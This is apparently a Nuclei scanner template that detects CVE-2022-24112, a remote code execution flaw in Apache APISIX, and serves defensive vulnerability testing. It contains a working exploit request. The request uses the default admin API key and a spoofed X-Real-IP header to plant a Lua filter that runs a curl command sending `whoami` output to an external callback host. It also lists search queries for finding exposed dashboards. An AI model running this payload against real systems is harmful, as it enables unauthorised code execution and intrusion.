id: CVE-2022-24112

info:
  name: Apache APISIX - Remote Code Execution
  author: Mr-xn
  severity: critical
  description: A default configuration of Apache APISIX (with the default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests that bypass the IP restriction of the Admin API. If the admin key has been changed, or the Admin API has been moved to a port different from the data panel, the impact is lower, but there is still a risk of bypassing the IP restriction of Apache APISIX's data panel. The batch-requests plugin contains a check that overrides the client IP with its real remote IP, but due to a bug in the code this check can be bypassed.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: Upgrade to 2.10.4 or 2.12.1. Alternatively, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled (or comment out `batch-requests` in `conf/config-default.yaml`).
  reference:
    - https://www.openwall.com/lists/oss-security/2022/02/11/3
    - https://twitter.com/sirifu4k1/status/1496043663704858625
    - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
    - http://www.openwall.com/lists/oss-security/2022/02/11/3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24112
    cwe-id: CWE-290
    epss-score: 0.96182
    epss-percentile: 0.9987
    cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: apisix
    shodan-query:
      - title:"Apache APISIX Dashboard"
      - http.title:"apache apisix dashboard"
    fofa-query:
      - title="Apache APISIX Dashboard"
      - title="apache apisix dashboard"
    google-query: intitle:"apache apisix dashboard"
  tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive,vkev,vuln

http:
  - raw:
      - |
        POST /apisix/batch-requests HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9

        {
          "headers":{
            "X-Real-IP":"127.0.0.1",
            "Content-Type":"application/json"
          },
          "timeout":1500,
          "pipeline":[
            {
              "method":"PUT",
              "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
              "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\"}"
            }
          ]
        }

      - |
        GET /api/{{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - '"reason":"OK"'
          - '"status":200'
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - http

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - GET \/([a-z-]+) HTTP
        part: interactsh_request
# digest: 4a0a00473045022037c63f1eae883e4e4e90ddf7d03afd2d146aca85c10e3fa9d633dd9434ee356d022100db2c0fc6a6d7e6215a7a854df47960e36f71663716ec559cfcaa213624a1c8f6:922c64590222798bb761d5b6d8e72950